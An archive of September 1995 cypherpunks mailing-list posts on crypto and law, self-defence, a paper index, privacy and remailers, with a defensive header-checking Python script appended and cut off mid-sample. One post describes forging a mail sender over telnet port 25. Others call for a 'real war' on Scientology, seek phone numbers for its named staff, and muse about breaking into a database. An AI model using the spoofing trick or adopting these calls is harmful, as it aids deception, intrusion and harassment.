> Put bluntly, will cryptography put lawyers out of business?

I certainly expect the world of business to change and reflect the use of 
cryptographic tech as soon as it becomes an acceptable practice to use it.
This may take awhile as the media and current administration continue to 
paint black anyone who wants to use such tech for any reason.

Should there come a time, however, when crypto is a fashionable and 
accepted thing, I would expect to see law offices offering to send and 
receive documents using such tech, as well as generating and maintaining
keys off-site for clients. With such a legal hoopla being made over 
crypto, I can not fathom lawyers not getting in on the action.. 

While the need for lawyers may decline with the increased use of crypto, 
I do not think they are about to become an endangered species. Those that 
are smart will find a way to profit from it, while those that can not 
adapt will be left behind (and who says lawyers are not part of evolution 
<g>)

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Wed, 6 Sep 95 12:52:47 PDT
To: "Cortland D. Starrett" <cort@bioanalytical.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509061709.MAA00612@bioanalytical.com>
Message-ID: <Pine.SUN.3.91.950906114150.20452A-100000@crl10.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Wed, 6 Sep 1995, Cortland D. Starrett wrote:

> Will cryptographic technology and information (communication)
> technology reduce the need for legal services in the future?
> (especially regarding contracts, buying/selling, patent law, etc.)
> Will legal services just look different?  Will they be more
> efficient (cheaper)?

The U.S. legal system is in free fall, and lawyers are almost
totally to blame.  ("Lawyers" as used here includes all judges 
and most legislators.)  This does not mean, however, that 
cryptographic/information/communications technologies can forgo
the use of advocates and arbiters.  There will always be a place
for people who can fulfill these functions.  They may or may not 
be called lawyers, but most of the same folks who now go into 
law, will be the dispute specialists of cyberspace.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cortland D. Starrett" <cort@bioanalytical.com>
Date: Wed, 6 Sep 95 09:54:06 PDT
To: cypherpunks@toad.com
Subject: "Living in real time, side A" (article ref)
Message-ID: <199509061651.LAA00565@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


"Living in real time, side A" by Ted Lewis, Naval Postgraduate School,
is an extremely concise (<3 pages) and insightful look into the future
of information technology and society.  Subjects dear to many cypherpunks
are indirectly addressed throughout.

A detail of particular interest to the lawyers on the list described
"A vapor trail of litigation".  The author notes that, "Plea bargaining,
out-of-court settlements, and appeals are the norm in Post-industrial
legal circles.  These are all legal devices for delaying the opposition
rather than deciding on a proactive course of action.  In the Info Age,
legal procedures will be too cumbersome and too expensive to accommodate
the rate of change."
...
"The mechanisms for protecting Info Age property (information) are
trade secrets and obsolescence."

other key terms:
Moore's Law, civilization on speed, inverse economics, rate of change,
Direct democracy tending toward anarchy...

The article can be found on page 8 of the September issue of IEEE Computer.

Cort.
(Mistakes in quotes are mine.)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 11:56:50 PDT
To: Jep Hill <jep@jephill.com>
Subject: Re: cryptography eliminates lawyers?
In-Reply-To: <199509061834.NAA27747@freeside.fc.net>
Message-ID: <Pine.LNX.3.91.950906115101.23559A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain




> Rob,
> 
> re:  Will Cryptography put lawyers out of business?
> 
> I see no connection between the use/non-use of crypto and the  
> occurrence/non-occurrence of the conflicts and threats of conflicts  
> which give rise to the use of lawyers.  What's the connection?

I know from my employer's perspective, that lawyers are retained for more 
than just litigation. Often they handle the exchange of critical 
documents and transactions that need to be kept confidential.

The impact of crypto as I see it is a reduction in the use of legal 
services of this nature, not in litigation. Using a lawyer to pass on 
tech specs on a new product to the patent office is a common occurrence, 
as it is assumed that the lawyer can maintain the secrecy required for 
handling these documents. Should the patent office offer a key, you could 
just as easily send an encrypted message in place of a lawyer handling this.

There are bound to be other options and opportunities as well for lawyers 
to use crypto.. securing a company's documents or whatever.

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 12:06:02 PDT
To: Thomas Grant Edwards <tedwards@src.umd.edu>
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <Pine.SUN.3.91.950906135128.3037A-100000@thrash.src.umd.edu>
Message-ID: <Pine.LNX.3.91.950906115827.23559B-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> > As far as I know the owner of property has no legal right to kill a person
> > either trespassing or stealing it in any of the 50 states. There was a
>  [...]
> In Maryland you have the responsibility to retreat if possible when 
   [...]
> You certainly do not have the right to use deadly force against someone 
> for any other reason than immediate threat of life or limb to you or 
> someone else.

Being a freedom loving, gun owner, with an interest in maintaining both 
my rights to guns, and my right to crypto, I am saddened to see that you 
have to retreat at all.

As far as I am concerned, if I am in my house, and someone uninvited is 
in there also (burglar/thief/psycho/whatever) then I have already 
sufficiently retreated.. and they will likely be shot. Anyone invading my 
home is considered a threat to my wife, children and myself.

I had heard that in the state of Texas, intruders/trespassers are at 
their own risk after sundown, as it is legal to fire upon them at that 
point, regardless of their intent.. I have not been able to confirm this, 
as of yet.. but am looking for the answer in my meager spare time.

RobL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cortland D. Starrett" <cort@bioanalytical.com>
Date: Wed, 6 Sep 95 10:11:51 PDT
To: cypherpunks@toad.com
Subject: cryptography eliminates lawyers?
Message-ID: <199509061709.MAA00612@bioanalytical.com>
MIME-Version: 1.0
Content-Type: text/plain


As a follow-up to the article reference I posted, I pose the
following question:

Will cryptographic technology and information (communication)
technology reduce the need for legal services in the future?
(especially regarding contracts, buying/selling, patent law, etc.)
Will legal services just look different?  Will they be more
efficient (cheaper)?

Put bluntly, will cryptography put lawyers out of business?

Any comments would be appreciated.

Cort.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 12:18:09 PDT
To: cypherpunks@toad.com
Subject: Re: Growth of actions definded as crime. Which math formula?
Message-ID: <ac73405d150210049a10@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:32 PM 9/6/95, Al Thompson wrote:
>At 02:00 AM 9/6/95 -0400, Black Unicorn wrote:
>
>>Created crimes are few and far between.
>
>You mean like buying a 30 round magazine, or putting a different
>stock of your choice on a rifle, or owning an automatic weapon,
>or mailing crypto out of the country, or hiring someone due to their
>race, or not hiring someone because they are "fat?"

Or drinking alcohol, or owning gold, or possessing a copy of a Traci Lords
video, or selling bullets recently declared illegal, or having a "men only"
gym (but "women only" gyms are legal), or making condoms available, or not
making condoms available, or teaching women how to use birth control, or
denying a Satanist a job at a child care center on the basis of his
religious beliefs, and so on. Too many transient, created crimes.

To answer Lucky's original question, one way to measure the total number of
new laws--most of them covering "created crimes"--is to measure the total
number of volumes of statutes at the Federal, state, and local levels.

I've seen figures on the "linear feet" of regulations, and how they are
growing exponentially, but I don't recall the numbers. Something like the
total number of laws doubling every 10 years or so, but don't quote me on
this one.

Whether these are "created crimes" in most cases is unclear, but certainly
the really basic crimes (murder, assault, rape, theft, etc.) were
adequately covered 20 years ago, or 50 years ago, etc. I can see some
reasons for refining the definitions in the light of new situations, but I
have to conclude that _most_ of the vast number of new laws and statutes
deal with "created crimes," as I understand the term.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Wed, 6 Sep 95 09:46:21 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Searchable Crypto Paper Archive?
In-Reply-To: <ac73124613021004c605@[205.199.118.202]>
Message-ID: <199509061642.MAA01932@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 6,  9:36, Timothy C. May sent the following to the NSA's mail
archives:
> Subject: Re: Searchable Crypto Paper Archive?

Thanks for the reply.  I think there are a few misconceptions, though.
  I've responded in place to some of your comments...

||
|| It's an idea with some attraction. But some issues need discussing. Being
|| an analytical sort of person, prone to looking for flaws in ideas, I'll
|| mention a few:
||
|| 1. First and foremost, _copyright_ issues. Most articles are copyrighted
|| (automatically, by Berne Convention) and the permission of the authors must
|| be obtained. Authors may also collect royalties, or the conferences may, so
|| unlimited electronic distribution is a potential problem.
||
|| NASA can publish its reports (and those of other government agencies)
|| electronically because it has the copyrights, or the copyrights are free
|| and clear. Try putting someone's article on the Net without their
|| permission and look out.
||
|| Indeed, there are a couple of the most important papers on the soda archive
|| site, some of them scanned-in and OCRed by "The Information Liberation
|| Front." There are so few that the authors likely don't even know they are
|| there, or care. But try to put lots of copyrighted material on a site and
|| get ready for actions. Remember, most nations are party to the Berne
|| Convention(s).

Hmmm... I guess I didn't specifically mention this point since it seemed
obvious to me, though I probably should have:  Papers should come from the
authors or the organization which holds the copyright.  I wouldn't be in
favor of accepting 3rd party submissions, for both copyright and
authenticity/integrity issues.

||
|| 2. Many of the papers have complex typography, lots of equations and
|| diagrams. These reproduce poorly on most screens, and really need a new
|| level of display presentation. (Yes, I know about Adobe Acrobat, which I
|| have. Ditto for FrameMaker, and a few other such systems. But not many
|| others have them.)
||
|| I happen to know the ILF member who posted the Chaum "Dining
|| Cryptographers" paper, anonymously, and know that he picked that paper both
|| because of its importance to his interests and because it was pure text,
|| with no equations and no diagrams. This made it a natural for scanning.
||

The model we've used so far is that the format of the papers is independent
of the bibliographic information which we index.  For example, the NASA
system I mentioned has papers in both HTML and Postscript formats.  The
abstracts (which are what's indexed) simply contain URLs, and don't really
care what the document types are.

In my experience, most of the target audience for technical papers has
access to a postscript previewer (for online viewing) and/or a postscript
printer, so postscript tends to be the format of choice.  Still, it can be
anything; text, PDF, scanned in TIFF files all have worked for us in the
past.

|| 3. In the crypto domain, the papers are much more conveniently concentrated
|| into a handful of conference proceedings, nearly all published by
|| Springer-Verlag. (Those great silvery-grey paperbacks.)
||
|| This point about Springer-Verlag relates to Item #1 above. Namely, that
|| copyright holders (Springer-Verlag, through publishing arrangements with
|| the conferences) will not take kindly to folks making the papers available
|| electronically.
||
|| This point, about the limited number of main crypto volumes, also implies
|| another point: many of these papers refer to other papers in the same
|| volume or set of volumes (e.g., papers in the "Crypto '93 Proceedings" will
|| refer to papers in that volume or earlier volumes). This makes it *even
|| more advantageous* for a serious researcher to buy the complete set of
|| volumes.
||

Now that's a pretty good point.  Wonder if we could convince them to make
their papers available electronically? 8-)

But ignoring them, there still seem to be a fair amount of cryptography
papers published as technical reports by individual authors or
organizations.  These would be what I'd like to see in CTRS.

|| 4. Authentication issues. Electronic versions of articles will need to be
|| signed, to prevent unauthorized modifications. The infrastructure for this
|| is beginning to build, but is clearly not available to many.
||
|| I am confident that someday most journals will be published electronically.
|| Many people think this likely, whether in 5 years or 15 years. Just too
|| many advantages.
||

Another good point, but I think this could easily be marked down as an
issue to be worked on after the basic functionality is available.  I'd hate
to see this as a reason for not doing something.

|| However--and this is my point--before that happens a huge amount of
|| negotiation about author's rights to reproduction, about verification of
|| copies, about royalty payments for copies, etc., has to happen. And, the
|| display software/hardware is not quite there yet....too many people would
|| be unable to see the equations and diagrams on the screen. In 5 years, less
|| of a problem.
||
|| Many authors make their papers available by anonymous ftp, or via the Web.
|| I think this is the way to do it: let those who feel their papers need
|| electronic dissemination do so. The author makes the choice.

This is exactly the target audience I'm looking for.  When an author wants
to put a paper up on his FTP or WWW site, I hope they'll also send me the
indexing information so that when people want to find it, they can use
CTRS. I'm not interested in actually storing a copy of the report, although
I'm willing to do so if they cannot make it available any other way.

||
|| In summary, this project is probably premature (technologically), has
|| numerous copyright issues to be resolved, and is probably less needed in
|| the crypto community than in some other areas.
||
|| (Granted, we are not following those other areas, necessarily. But that
|| other domains have not yet gone fully electronic is indicative that others
|| see some of these same problems, and are likely to address them before the
|| math/crypto community does.)
||

I have to disagree strongly about the technologically premature part, since
I have had a lot of experience to the contrary during my involvement with
several major technical report systems.  I'm afraid I also have to disagree
with you about the need for this service.  Having attempted to find some of
the reports which I've heard are available on the Net, I'd have to say it's
not a task I'd set an Internet novice to, or one I'd give to someone on a
deadline.  I think a good bibliographic database like I propose in CTRS
would be a definite help.  And at the very very very least, it probably
won't hurt. 8-)

|| Sorry to dissect this proposal so thoroughly, but it's one of the things
|| I do.
||

S'ok with me.  It's not like I'm dead set on doing this or anything.  It's
just an observation, and an offer of service if anyone thinks it'd be
useful.

Oh, BTW, another thing I probably should mention that seems obvious to me:
 I'm offering to do this for free.  That is, the database would be a public
service, with no charge to list papers, add another database to the
searching list or to query/retrieve abstracts.


--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			|
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Wed, 6 Sep 95 09:55:18 PDT
To: Adam Shostack <adam@bwh.harvard.edu>
Subject: Re: Searchable Crypto Paper Archive?
In-Reply-To: <199509061632.MAA00622@james.bwh.harvard.edu>
Message-ID: <199509061650.MAA01945@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 6, 12:32, Adam Shostack sent the following to the NSA's mail
archives:
> Subject: Re: Searchable Crypto Paper Archive?
|| | Anyway, this is what I'd like to see.  I'm willing to work on such a
|| | system if there's enough positive feedback.  Does anyone else think
|| | they'd like to use or contribute to such a system?
|| |
||
|| I think this would be a fabulously useful service, one which I'd be
|| glad to subscribe to as an amateur.  (I could see forking over $20-50
|| for search priority, possibly more if it was really well done).
||

Ack!  Money involved? "Just say no!" 8-)  When I said "contribute" I meant
placing papers in it, or if you've got a lot already, adding your own
database to the list of possible search sites.

I wanna do this as a free service.  There are several reasons (like I can't
see charging people for information that I didn't even produce), but the
real reason for doing it is simple: I wanna use it.

I made a mock up of CTRS, which is available at:

	http://www.itribe.net/CTRS/
	https://www.itribe.net/CTRS/	 (of course we have to offer SSL 8-)

There aren't any crypto papers in it yet, though.  The iTRiBE database (the
only one available for searching right now) is filled with some NASA test
data.  Try doing searches on things like "ratio" or "nasa" for an example
of the output you'd get.

||
||	Don't forget the value of sci.crypt[.research] and cypherpunks
|| postings, nor of crypto 'rump session' papers.

I admit I hadn't thought of these.  I'm not sure I could sign up for the
task of archiving the newsgroups (disk space) but if the authors/copyright
holders of rump papers want to submit them, I'd be happy to index them.  I
don't think the database necessarily has to be composed only of refereed
papers or anything.  I'd be happy to index rump papers, technical reports
or maybe even presentation materials like postscript copies of overhead
transparencies.

Anyway, thanks for the reply!

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			|
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scottg@b4a206.mdc.com (TECO Master)
Date: Wed, 6 Sep 95 13:28:28 PDT
To: CYPHERPUNKS@toad.com
Subject: Where is Secure Drive 1.4?
Message-ID: <95090613224714@b4a206.mdc.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

<Decloaking after 3+ years>

Hi Folks,

I have a previous version of SecureDevice (v1.3).
Is v1.4 the current version or something higher?
Where is an FTP site so I can grab it?

TIA,

scott gallaher <scottg@b4a206.mdc.com> | I believe in the 1st Amendment.
TECO Master & DBA		       | Pornography is just a fringe benefit.
PGP Key fingerprint: AD A8 C9 AA D7 D3 6A E3  0C 58 5A 10 41 37 45 EE

GCS d- s+: a C++++ U->L++++ P? L>+++ !E[teco+++] W N++ k- w--- !O M- V$ PS+
PE Y++ PGP(++) t+ !5 X R(++) tv+ b++(+++) DI+ !D G e++ h----(*) r+++ y++++(++*)
	-- Geek Code V3.0

<Resuming lurking mode...>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBME4SV9PstJd5R1NxAQFN9wH/UYh59UzgBKotUs/HDYJ7jHEPlcmOIy/E
Zo74KQcSb9QtaPMntSpHiZq3W1ZaIRrl+jx9HkZbsBbXHRVi7+HGXQ==
=xvbE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alt@iquest.net (Al Thompson)
Date: Wed, 6 Sep 95 11:39:07 PDT
To: Black Unicorn <shamrock@netcom.com>
Subject: Re: Growth of actions definded as crime. Which math formula?
Message-ID: <m0sqPMa-00069JC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:00 AM 9/6/95 -0400, Black Unicorn wrote:

>Created crimes are few and far between.
  
You mean like buying a 30 round magazine, or putting a different
stock of your choice on a rifle, or owning an automatic weapon,
or mailing crypto out of the country, or hiring someone due to their
race, or not hiring someone because they are "fat?"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dsc@swcp.com (Dar Scott)
Date: Wed, 6 Sep 95 12:52:37 PDT
To: cypherpunks@toad.com
Subject: Re: cryptography eliminates lawyers?
Message-ID: <v01510102ac73a743a371@[198.59.115.139]>
MIME-Version: 1.0
Content-Type: text/plain


Cort Starrett wrote,
>Put bluntly, will cryptography put lawyers out of business?

Even in a cryptoanarchy I would want to treat customers kindly and I would
want to make sure that in any agreement that both parties are clear as to
when we are complying or not.  A lawyer might help in complex cases.
Especially if UCC is referenced.

And in some kinds of escrow a "judge" might be invoked if there is a
dispute.  The judge might be a lawyer or might bring in a lawyer as an
expert.

The nature of the work of a lawyer in a cryptoanarchy might be very
different.  Lawyers might even become highly respected and liked!

Dar
(list newbie)

===========================================================
Dar Scott               Home phone: +1 505 299 9497

Dar Scott Consulting         Voice: +1 505 299 5790
8637 Horacio Place NE        Email: darscott@aol.com
Albuquerque, NM  87111              dsc@swcp.com
                               Fax: +1 505 898 6525
http://www.swcp.com/~correspo/DSC/DarScott.html
===========================================================






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 6 Sep 95 10:54:06 PDT
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <199509060419.XAA04296@einstein.ssz.com>
Message-ID: <Pine.SUN.3.91.950906135128.3037A-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Jim Choate wrote:

> As far as I know the owner of property has no legal right to kill a person
> either trespassing or stealing it in any of the 50 states. There was a
> recent federal ruling that basically says that if you meet a burglar in your
> home at nite you can not kill or otherwise harm them unless your life is
> directly threatened. In short, you MUST give up the ground if at all
> possible.

In Maryland you have the responsibility to retreat if possible when 
confronted by someone threatening your life or limb.  If you are unable 
to retreat or are in your domicile (or motel room, etc.) you have the 
right to use deadly force to stop an attack.

You certainly do not have the right to use deadly force against someone 
for any other reason than immediate threat of life or limb to you or 
someone else.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@src.umd.edu>
Date: Wed, 6 Sep 95 10:56:41 PDT
To: cypherpunks@toad.com
Subject: Anonymous CU-SeeMe reflector
Message-ID: <Pine.SUN.3.91.950906135430.3037C-100000@thrash.src.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain



If anybody has worked on or is interested in working on creating an 
anonymous CU-SeeMe reflector, please contact me (where anonymous in this 
case means that CU-SeeMe clients do not report the proper IP numbers of 
other clients).  I've done a bit of work on it but can't quite get 
"normal" reflector behaviour.

-Thomas Edwards





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Kari Laine" <buster@klaine.pp.fi>
Date: Wed, 6 Sep 95 04:37:21 PDT
To: cypherpunks@toad.com
Subject: Re: Police and scientology visit XS4ALL Amsterdam
Message-ID: <199509061135.AA26720@personal.eunet.fi>
MIME-Version: 1.0
Content-Type: text/plain



>         PRESS RELEASE
>         -------------
>     Police and members of Scientology church enter offices of XS4ALL
>     ================================================================
They really are not getting it - are they stupid or what?
Scientology people are not behaving so I take a standing
that I don't have to behave when I treat them as well.
Good, remember they started it ...

> Today at about 14:00, XS4ALL was visited by Mr. S. Braan,
> bailiff. 
Sorry to hear that Mr. Braan

>Religious Technology Centre
O camoon - that name sounds great what's
inside it? Research department of Brainwashing?
Was that the technology you tried to sell
to CIA? And luckily CIA told you to piss off.

>, better known as the Scientology Church, or
> Scientology for short. He was assisted by a local police officer and Mr.
> Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology
> in The Netherlands. 

We would need a list of all legal offices representing scienos 
in all countries. Also does anyone have a list of top scienos
and some kind of organization flow chart of this evil 
emperium?

>Also present were two computer experts (Mr. Ootjes
> and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and
> two American employees of Scientology, Mr. Weightman and Ms. Jenssen.
Does anyone have tel number to these Co$s?

> Scientology is filing for seizure of XS4ALL's computer equipment. Under
> dutch law, this means that a bailiff comes in to record your assets. In
> real-life, the computer-experts that were present have recorded the
> types and serial numbers of all the computers in our offices. They did
> not take any equipment, the continuity of XS4ALL's services is not in
> jeopardy.
Good - you have civilised police there.

> XS4ALL is not alone in receiving this kind of attention from
> Scientology. Scientology, a semi-religious multinational, is at war with
> a number of people on the Internet. 
They want a war - well let's give them one! I don't mean this
bashing in the net - I mean a REAL WAR! Co$ has been on
offensive for some time now and they must be got to the defence mode.

> Until recently, the church has always managed to suppress critical voices
> by means of sheer intimidation and by engaging in endless legal battle.
I think it would be a jolly good day if they would try that against 
me. I would make best of it...

> One of these documents is a piece to which Scientology supposedly holds
> the copyright and which has been added to the kit without the church's
> permission.
Screw with their permission.

Sorry for the raw language but I get so damn angry when I even see
these scienos mentioned. 

To fight them we need an organization to fight them. Today's
situation is like uncontrolled and therefore unoptimised guerrilla
operations. Results will be weak.

Best Regards
Kari Laine
Kari Laine          buster@klaine.pp.fi
LAN Vision Oy       Tel. +358-0-502 1947
Sinikalliontie 14   Fax  +358-0-524 149
02630 ESPOO         BBS  +358-0-502 1576/1456
FINLAND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Lambert <dlambert@aigtc.com>
Date: Wed, 6 Sep 95 11:36:35 PDT
To: cypherpunks@toad.com
Subject: Anonymous http daemon?
Message-ID: <199509061821.OAA01040@ptolemy>
MIME-Version: 1.0
Content-Type: text/plain


Hi.

Some time ago, there were some discussions concerning an
anonymous http daemon.  As far as I can recall, the discussion
just sort of trailed off, and nothing got implemented.

I'm considering making an anonymous server available, and
would like:
   1. to know whether I need to hack some code
      (or if someone has done so already)
   2. to reopen the discussion of the desirable
      characteristics such a beast would possess.

- David C. Lambert
  dlambert@aigtc.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob Lowry <robl@on-ramp.ior.com>
Date: Wed, 6 Sep 95 15:16:06 PDT
To: cypherpunks@toad.com
Subject: Re: Collection of personal info
In-Reply-To: <Pine.BSI.3.91.950906163504.11543A-100000@usis.com>
Message-ID: <Pine.LNX.3.91.950906150842.2139A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> Well, I did say all typos were _mine_ -- That's 1995 folks, just for the
> record and thanks to Tom Swiss for being the first in a long line
> of people who will point this out. :-)

-would you expect anything less from us? <g>
> 
> But back to the topic; am I the only one who gets the willies just
> reading this?  

Beyond having the willies.. This is more than just scary, it feels like
rape when you think about it for awhile. Everything you buy, on credit, is
recorded and sold to someone who wants to know your secrets. Every time 
you make a banking transaction, someone is watching and compiling the 
data. 

Is there any legal recourse to get your name removed from the sellable list?
Or is it too late and we can not save even the vestiges of our privacy?

Oh, but if only I had the 'hacker' skill to break into such a database..
I have always been against the destruction of data.. but there are 
exceptions...

RobL <another newbie to the list.. >





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 6 Sep 95 12:39:50 PDT
To: cypherpunks@toad.com
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <Pine.LNX.3.91.950906115827.23559B-100000@on-ramp.ior.com>
Message-ID: <9509061938.AA02249@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Under UK law it is certainly illegal to create any device with the
intention of causing grievous bodily harm to anyone. The right to self
defense is very precisely that, the right to take reasonable steps to 
defend yourself with commensurate force if attacked.

If someone hits you in the face you do not have the right to kill
him. If someone tries to do serious harm to you and the only way
to avoid that harm is to kill them that is self defense.


There is no self defense argument where the purpose is not to prevent
physical harm. 

Any device intended to cause harm to someone tampering with a computer
could well land the perpetrator in jail for a very long time for
attempted murder or murder.


People who go round drawing parallels to gun ownership and cryptography 
ownership are simply playing into the government's hands. Cryptography has net 
benefits to society. Most advocates of gun ownership tend to convince me of 
little more than they are a danger to society. Regardless of their case they are 
the biggest argument for gun control, and therefore poor advocates of their 
cause. I see their attempts to draw parallels with cryptography to be little 
more than trying to shore up their sinking ship with one that's afloat.


		Phill



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Wed, 6 Sep 95 13:51:15 PDT
To: cypherpunks@toad.com
Subject: Collection of personal info
Message-ID: <Pine.BSI.3.91.950906151200.9473A-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain



I sent this to the risks moderator some time back, but I guess
he didn't like it.  For those of you who think that perhaps
people advocating cybercash are just a bunch of paranoid lunatics.

--------------
As advertised in the trade magazine "DM News" (Direct Marketing News),
Apr. 24, 1997, V. 17 N. 16.  I've typed the entire text of the advertisement,
any typos are mine.

From the huge number of people in the database, it would seem that TRW
is now marketing a subset of their credit records they keep on everyone.
Does anyone else remember the flap over Lotus' product (Magellan) that
was going to allow something similar?  

The risks? This is the perfect database if you want to red-line your offerings.
I'm sure others will have more creative answers. 


--------------
TRW DISCOVERED


Some very smart people are uncovering exciting ways to increase response rates,
find profitable customers, and develop new market niches.  It's been a well
kept secret.  Now it's out.

It's TRW.

It all started with the search for more creative information solutions.
Solutions that help you discover hidden markets and unique ways of using
ordinary data to target qualified prospects.

The result: a proven and massive database in the hands of people with
real data management know-how.

So far the findings have revealed:
 o A database of 170+ million consumers
 o 100+ demographic, psychographic and geographic selects
 o A full range of computer services.
 o Comprehensive motor vehicle data

From this comes an array of products and services to intrigue even the most
seasoned direct marketer.  One of these is called the TRW Smart Targeting Tools (SM).
It links 98 million households with the goods and services they are most likely
to buy.  Choose consumer names by 50 neighborhood or 3600 household level clusters,
by 56 broad product categories or by 516 specific product or brand preferences.

Looking at all the advantages, TRW may be the direct marketer's find of this
century.  And the next.

Energize your marketing.  Contact your TRW representative or call 800.527.3933
Ext 640.  You have a great find ahead of you.


TRW Target Marketing Services
Your one source for reaching all the right people.

701 TRW Parkway
Allen, TX 75002-3717
800.527.3933



David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Wed, 6 Sep 95 15:51:05 PDT
To: cypherpunks@toad.com
Subject: Re: Direct Socket to Remailer?
Message-ID: <ac73d0d902021004dc09@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:41 PM 9/3/95, starrd@iia2.org wrote:
>On Fri, 1 Sep 1995, Lance Cottrell wrote:
>
>> You should try the telnet port 25 trick. It is amazingly simple (but not
>> secure). Just "telnet some.machine.com 25" and type help. It will guide you
>> through it. It is quite informative.
>
>Be sure to test it first, sometimes it records who *really* sent it as
>well as the "forged" return address.
>
>Test it by mailing to yourself and then look at all the headers.
>

I should have been more clear. I was advocating this as interesting and
educational, not as an effective anonymity technique.

        -Lance


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------
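
[Added example, not part of the original messages: the header check suggested in the quoted reply above ("mail to yourself and then look at all the headers"), written as a Python script. It reads the Received lines written by servers you trust and reports whether the connecting host was recorded next to the hand-typed From address. The two sample messages, all host names and the TRUSTED set are constructed for illustration; Received formats vary between mail servers, so the pattern below is an assumption about one common layout.]

```python
import re
from email import message_from_string
from email.utils import parseaddr

RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)"                # name the client typed in HELO
    r"(?:\s+\((?P<peer>[^()\[\]\s]+)?\s*"  # name the server looked up itself
    r"\[(?P<ip>[0-9A-Fa-f.:]+)\]\))?"      # address of the TCP connection
    r"\s+by\s+(?P<by>\S+)",                # server that wrote this line
    re.IGNORECASE,
)

# Constructed sample 1: the relay recorded the connecting host. The last
# Received line names a server outside TRUSTED, so it is not relied on.
SAMPLE_RECORDED = """\
Received: from relay.example.net (relay.example.net [192.0.2.25])
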